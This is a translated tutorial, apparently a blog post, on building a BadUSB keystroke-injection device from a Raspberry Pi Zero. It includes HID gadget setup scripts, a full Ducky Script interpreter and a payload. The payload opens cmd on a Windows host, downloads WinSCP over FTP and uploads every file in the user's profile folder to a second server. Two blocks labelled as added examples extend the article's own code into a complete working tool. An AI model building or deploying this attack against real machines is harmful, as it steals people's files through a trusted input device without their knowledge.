This article was first published on the WeChat public account WriteSimpleDemo; see the account for full details.
https://github.com/pedroqin/RaspberryPi-based-multi-functional-USB-Device
BadUSB is a dangerous class of USB attack in which an ordinary-looking USB device presents itself to the host as a keyboard and then types malicious commands into the victim's computer; the host accepts them because keyboards are trusted input devices.
There is a BadUSB-style demonstration in Iron Man 1 at 1:31:09.
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).
That option was dropped: it does not support the latest Debian 10, and because it bundles many functions its configuration conflicts with the other parts of the multifunction USB device built here.
Payload: in this article the term simply means the script that carries out one BadUSB function (for example unlocking Windows, or opening a cmd window and running commands).
This article takes the second approach. The implementation has three parts: emulating an HID keyboard, a payload interpreter, and the keystroke input itself.
# Enable dwc2 on the Pi
echo "dtoverlay=dwc2" | sudo tee -a /boot/config.txt
# Enable dwc2 initialisation
echo "dwc2" | sudo tee -a /etc/modules
echo "libcomposite" | sudo tee -a /etc/modules
Enable the corresponding service and reboot. The gadget itself is created by the following script:
#!/bin/bash
# Initial Setup
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
# Device description
echo 0x1d6b > idVendor # Linux Foundation
echo 0x0104 > idProduct # Multifunction Composite Gadget
echo 0x0100 > bcdDevice # v1.0.0
echo 0x0200 > bcdUSB # USB2
mkdir -p strings/0x409
echo "abcdef1234567890" > strings/0x409/serialnumber
echo "Pedro Qin" > strings/0x409/manufacturer
echo "raspberry USB device" > strings/0x409/product
# Define a Keyboard
mkdir -p functions/hid.usb0
echo 1 > functions/hid.usb0/protocol
echo 1 > functions/hid.usb0/subclass
echo 8 > functions/hid.usb0/report_length
echo -ne \\x05\\x01\\x09\\x06\\xa1\\x01\\x05\\x07\\x19\\xe0\\x29\\xe7\\x15\\x00\\x25\\x01\\x75\\x01\\x95\\x08\\x81\\x02\\x95\\x01\\x75\\x08\\x81\\x03\\x95\\x05\\x75\\x01\\x05\\x08\\x19\\x01\\x29\\x05\\x91\\x02\\x95\\x01\\x75\\x03\\x91\\x03\\x95\\x06\\x75\\x08\\x15\\x00\\x25\\x65\\x05\\x07\\x19\\x00\\x29\\x65\\x81\\x00\\xc0 > functions/hid.usb0/report_desc
mkdir -p configs/c.1/strings/0x409
ln -s functions/hid.usb0 configs/c.1/
echo "Config 1: Keyboard" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
ls /sys/class/udc > UDC
# for status check
touch /tmp/enable_hid.lock
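Once the script has run, the first thing to check is that the gadget actually bound to the UDC and that /dev/hidg0 appeared; the second is a way to undo it, because the script is not idempotent (the ln -s fails with "File exists" on a second run, and writing to UDC while the gadget is already bound returns EBUSY). The following is an added example, not code from the article or the repositories it links; the function names and the GADGET variable are this example's own, and GADGET can be pointed at a scratch directory for a dry run.

```shell
#!/bin/sh
# Added example, not part of the original article: status check, unbind and clean teardown for the
# configfs gadget that the script above creates. GADGET is the gadget directory; it defaults to the
# g1 directory used above and can be pointed at a scratch directory for a dry run.
GADGET="${GADGET:-/sys/kernel/config/usb_gadget/g1}"

# Name of the UDC the gadget is bound to, or an empty string when unbound.
bound_udc() {
    cat "$GADGET/UDC" 2>/dev/null || true
}

# Report binding state and whether the keyboard node exists. Returns 0 when bound, 1 when not.
gadget_status() {
    udc=$(bound_udc)
    if [ -z "$udc" ]; then
        echo "gadget $GADGET is not bound to a UDC"
        return 1
    fi
    echo "gadget bound to UDC $udc"
    if [ -e /dev/hidg0 ]; then echo "HID node /dev/hidg0 present"; else echo "warning: /dev/hidg0 missing"; fi
    return 0
}

# Unbind from the UDC; the host sees the device unplug. Writing an empty string to UDC is the
# configfs unbind operation, and it fails if the gadget is already unbound, hence the check.
gadget_unbind() {
    if [ -n "$(bound_udc)" ]; then
        echo "" > "$GADGET/UDC"
    fi
}

# Remove the gadget in the reverse order of creation. configfs refuses to rmdir a directory that
# still has user-created children, so: function links in each config, config strings, configs,
# functions, device strings, and last the gadget directory itself.
gadget_teardown() {
    [ -d "$GADGET" ] || return 0
    gadget_unbind
    for link in "$GADGET"/configs/*/*.*; do           # e.g. configs/c.1/hid.usb0 -> functions/hid.usb0
        if [ -L "$link" ]; then rm "$link"; fi
    done
    for d in "$GADGET"/configs/*/strings/*; do
        if [ -d "$d" ]; then rmdir "$d"; fi
    done
    for d in "$GADGET"/configs/*; do
        if [ -d "$d" ]; then
            rmdir "$d/strings" 2>/dev/null || true     # attribute group on configfs: not removable, goes with its parent
            rmdir "$d"
        fi
    done
    for d in "$GADGET"/functions/* "$GADGET"/strings/*; do
        if [ -d "$d" ]; then rmdir "$d"; fi
    done
    # On configfs the remaining entries (UDC, idVendor, ..., the strings/configs/functions groups)
    # are kernel-owned and disappear with the gadget directory, so these two lines are no-ops there;
    # they only matter when dry-running against a scratch directory of plain files.
    rm -f "$GADGET/UDC" 2>/dev/null || true
    rmdir "$GADGET/strings" "$GADGET/configs" "$GADGET/functions" 2>/dev/null || true
    rmdir "$GADGET"
}

case ${1:-} in
    status)   gadget_status ;;
    unbind)   gadget_unbind ;;
    teardown) gadget_teardown ;;
esac
```

Saved as, say, gadget-ctl.sh, `sh gadget-ctl.sh status` confirms the binding after the setup script, and `sh gadget-ctl.sh teardown` lets the setup script be run again without rebooting.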
The following is a payload named "ftp download upload":
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
STRING ftp -i SERVER
ENTER
DELAY 800
STRING USERNAME
ENTER
STRING PASSWORD
ENTER
STRING GET WinSCP.com
ENTER
DELAY 200
STRING GET WinSCP.exe
ENTER
DELAY 3000
STRING quit
ENTER
REM FTP user only needs write access.
STRING WinSCP.com /command "option batch abort" "option confirm off" "open ftp://USERNAME2:PASSWORD2@SERVER2" "put *.*" "close" "exit"
ENTER
ALT SPACE
STRING N
Based on this payload script a simple interpreter can be written; its main logic is as follows:
......
# The payload text is passed in as the argument; dispatch on the first three characters of each line
echo "$@" | while read -r line; do
    case ${line:0:3} in
        # CONTROL / CTRL: modifier byte bit0
        CON|CTR)
            prefix="\x1"
            press_one_key "$prefix" "${line#* }"
            ;;
        # ALT: modifier byte bit2
        ALT)
            prefix="\x4"
            press_one_key "$prefix" "${line#* }"
            ;;
        # SHIFT: modifier byte bit1
        SHI)
            prefix="\x2"
            press_one_key "$prefix" "${line#* }"
            ;;
        # GUI (Windows key): modifier byte bit3
        GUI)
            prefix="\x08"
            press_one_key "$prefix" "${line#* }"
            ;;
        # REM: comment, skip
        REM)
            continue
            ;;
        # STRING: type the rest of the line
        STR)
            input_string "${line#* }"
            ;;
        # ENTER
        ENT)
            press_enter
            ;;
        # DELAY: Ducky Script delays are in milliseconds, sleep takes seconds
        DEL)
            ms="${line#* }"
            sleep "$(printf '%d.%03d' $((ms / 1000)) $((ms % 1000)))"
            ;;
        # EXIT
        EXI)
            return
            ;;
        # anything else is typed literally
        *)
            input_string "${line}"
            ;;
    esac
done
......
HID keyboard protocol: HID Usage Tables 1.12, section 10, Keyboard/Keypad Page (0x07).
To type a string, the text has to be translated into HID keycodes, which the emulated keyboard sends and the host turns back into the same text. There are two ways to do this, and in practice they have to be combined: the scan tool (below) handles ordinary string input, and the script handles control sequences such as ctrl r.
A USB keyboard report is 8 bytes:
BYTE1 -- modifier keys
|--bit0: Left Control (1 = pressed)
|--bit1: Left Shift (1 = pressed)
|--bit2: Left Alt (1 = pressed)
|--bit3: Left GUI (Windows key) (1 = pressed)
|--bit4: Right Control (1 = pressed)
|--bit5: Right Shift (1 = pressed)
|--bit6: Right Alt (1 = pressed)
|--bit7: Right GUI (1 = pressed)
BYTE2 -- reserved, always 0
BYTE3-BYTE8 -- keycodes of the ordinary keys currently held, up to six at a time
After each key press, a report of eight zero bytes must be sent to release the keys.
Example, typing "A" (Left Shift = bit1 of byte 1, keycode 0x04 = a):
echo -ne "\x2\0\x04\0\0\0\0\0" > /dev/hidg0
sleep 0.1
echo -ne "\0\0\0\0\0\0\0\0" > /dev/hidg0
Keyboard input can be emulated this way, but a delay must be inserted between keystrokes.
Drawbacks: slow, and some characters do not come out correctly.
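The interpreter sketch above and the report layout just described come together in the following script, an added example that is not the article's own code: it compiles Ducky Script lines into 8-byte reports and writes them to the gadget's HID node, including the modifier combinations (GUI r, ALT SPACE) that the scan tool below cannot send. It assumes a US keyboard layout on the host and the /dev/hidg0 node from the gadget script; the HID_DEV and KEY_DELAY variables and all function names are this example's own.

```shell
#!/bin/sh
# Added example (not the article's own code): a small Ducky Script interpreter that turns
# STRING / ENTER / DELAY / modifier+key lines into 8-byte boot-keyboard reports and writes
# them to HID_DEV (default /dev/hidg0, the node created by the gadget script earlier).
# Assumes a US keyboard layout on the host; keycodes come from HID Usage Tables 1.12, page 0x07.
HID_DEV="${HID_DEV:-/dev/hidg0}"
KEY_DELAY="${KEY_DELAY:-0.01}"   # pause after each key so a slow host does not drop reports

# Write one report: byte1 = modifier bitmask, byte2 = reserved 0, byte3 = keycode, bytes 4-8 = 0.
# Arguments are decimal. Octal escapes are used because POSIX printf (dash) has no \x escapes.
send_report() {
    printf "\\$(printf '%03o' "$1")\\000\\$(printf '%03o' "$2")\\000\\000\\000\\000\\000" >> "$HID_DEV"
}

# Press and release: the key report followed by the all-zero release report.
tap_key() {
    send_report "$1" "$2"
    send_report 0 0
    sleep "$KEY_DELAY"
}

# Map one printable ASCII character to "modifier keycode" (both decimal). Letters and digits are
# computed from the usage table layout (a=4..z=29, 1=30..9=38, 0=39); shifted keys set bit1
# (Left Shift = 2). Unknown characters return 1 so the caller can skip them.
char_to_key() {
    c=$1
    n=$(printf '%d' "'$c")                                                                # ASCII value
    if [ "$n" -ge 97 ] && [ "$n" -le 122 ]; then echo "0 $((n - 97 + 4))"; return 0; fi  # a-z
    if [ "$n" -ge 65 ] && [ "$n" -le 90 ];  then echo "2 $((n - 65 + 4))"; return 0; fi  # A-Z
    if [ "$n" -ge 49 ] && [ "$n" -le 57 ];  then echo "0 $((n - 49 + 30))"; return 0; fi # 1-9
    case $c in
        0) echo "0 39" ;;     ' ') echo "0 44" ;;
        '-') echo "0 45" ;;   '_') echo "2 45" ;;   '=') echo "0 46" ;;   '+') echo "2 46" ;;
        '[') echo "0 47" ;;   '{') echo "2 47" ;;   ']') echo "0 48" ;;   '}') echo "2 48" ;;
        '\\') echo "0 49" ;;  '|') echo "2 49" ;;   ';') echo "0 51" ;;   ':') echo "2 51" ;;
        "'") echo "0 52" ;;   '"') echo "2 52" ;;   '`') echo "0 53" ;;   '~') echo "2 53" ;;
        ',') echo "0 54" ;;   '<') echo "2 54" ;;   '.') echo "0 55" ;;   '>') echo "2 55" ;;
        '/') echo "0 56" ;;   '?') echo "2 56" ;;   '!') echo "2 30" ;;   '@') echo "2 31" ;;
        '#') echo "2 32" ;;   '$') echo "2 33" ;;   '%') echo "2 34" ;;   '^') echo "2 35" ;;
        '&') echo "2 36" ;;   '*') echo "2 37" ;;   '(') echo "2 38" ;;   ')') echo "2 39" ;;
        *) echo "warning: no keycode for '$c'" >&2; return 1 ;;
    esac
}

# Keycode for a key name as used after a modifier (GUI r, ALT SPACE) or on its own (ENTER, TAB).
name_to_key() {
    case $1 in
        ENTER) echo 40 ;;  ESCAPE|ESC) echo 41 ;;  BACKSPACE) echo 42 ;;  TAB) echo 43 ;;
        SPACE) echo 44 ;;  CAPSLOCK) echo 57 ;;    DELETE) echo 76 ;;
        UPARROW|UP) echo 82 ;;  DOWNARROW|DOWN) echo 81 ;;  LEFTARROW|LEFT) echo 80 ;;  RIGHTARROW|RIGHT) echo 79 ;;
        F[1-9]|F1[0-2]) echo $(( ${1#F} + 57 )) ;;               # F1 = 58 ... F12 = 69
        ?) k=$(char_to_key "$1") || return 1; echo "${k#* }" ;;  # single character such as r
        *) return 1 ;;
    esac
}

# Execute one payload line. Returns 1 only for EXIT so the caller can stop.
run_line() {
    line=$1
    cmd=${line%% *}      # first word
    arg=${line#* }       # rest of the line (equals $line when there is no space)
    mod=0
    case $cmd in
        REM|'') return 0 ;;
        STRING)
            rest=$arg
            while [ -n "$rest" ]; do
                ch=${rest%"${rest#?}"}; rest=${rest#?}          # peel off the first character
                key=$(char_to_key "$ch") || continue
                tap_key $key                                   # unquoted on purpose: splits into "mod code"
            done ;;
        DELAY) sleep "$(printf '%d.%03d' $((arg / 1000)) $((arg % 1000)))" ;;   # ms -> s
        EXIT) return 1 ;;
        CONTROL|CTRL) mod=1 ;;
        SHIFT) mod=2 ;;
        ALT) mod=4 ;;
        GUI|WINDOWS) mod=8 ;;
        *) k=$(name_to_key "$cmd") || { echo "warning: unknown command '$cmd'" >&2; return 0; }
           tap_key 0 "$k" ;;
    esac
    if [ "$mod" -ne 0 ]; then
        if [ "$arg" = "$line" ]; then
            tap_key "$mod" 0                                   # modifier alone, e.g. GUI opens the Start menu
        else
            k=$(name_to_key "$arg") || return 0
            tap_key "$mod" "$k"
        fi
    fi
    return 0
}

# Run a payload file (or stdin) line by line. Only one modifier per line is supported.
run_payload() {
    while IFS= read -r line || [ -n "$line" ]; do
        run_line "$line" || break
    done < "${1:-/dev/stdin}"
}

if [ -n "${1:-}" ]; then run_payload "$1"; fi
```

Saved as, say, ducky.sh, it is run on the Pi as `sh ducky.sh payload.txt` once /dev/hidg0 exists (as root, or with a udev rule that opens the node to the user). Setting HID_DEV to an ordinary file lets the generated reports be inspected with `od -tx1` before the device is plugged into a real host, which is the quickest way to find a wrong keycode. Keep the per-key delay: the release report has to reach the host as a separate transfer, or repeated characters are merged.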
root@raspberrypi:/tmp# git clone https://github.com/girst/hardpass-passwordmanager
Cloning into 'hardpass-passwordmanager'...
remote: Enumerating objects: 446, done.
remote: Total 446 (delta 0), reused 0 (delta 0), pack-reused 446
Receiving objects: 100% (446/446), 2.00 MiB | 66.00 KiB/s, done.
Resolving deltas: 100% (263/263), done.
Checking out files: 100% (165/165), done.
root@raspberrypi:/tmp# cd hardpass-passwordmanager/send_hid/
root@raspberrypi:/tmp/hardpass-passwordmanager/send_hid# ls
LICENSE Makefile README.md hardpass-demo.sh main.c scan scancodes.c scancodes.h
root@raspberrypi:/tmp/hardpass-passwordmanager/send_hid# make
gcc -std=c99 -Wall -Werror main.c scancodes.c -o scan
The compiled scan tool can type strings.
Drawback: it only types strings; it cannot send control sequences such as GUI r (this could be added by modifying the source).
The video demonstrates the payload script mode, and remote control when combined with AP mode.
(Video 2)
Well, a payload can be considered to be somewhat similar to a virus. A payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits that you can’t imagine. … Generally, a payload refers to a set of codes which a hacker designs according to his/her requirements.
what is payload in hacking(https://www.cybrary.it/0p3n/payload-the-hacking-beyond-imagination/)
Payloads(https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads)
hardpass-passwordmanager(https://github.com/girst/hardpass-passwordmanager)
pi-as-keyboard(https://github.com/c4software/pi-as-keyboard)
HID Usage Tables 1.12(https://usb.org/sites/default/files/documents/hut1_12v2.pdf)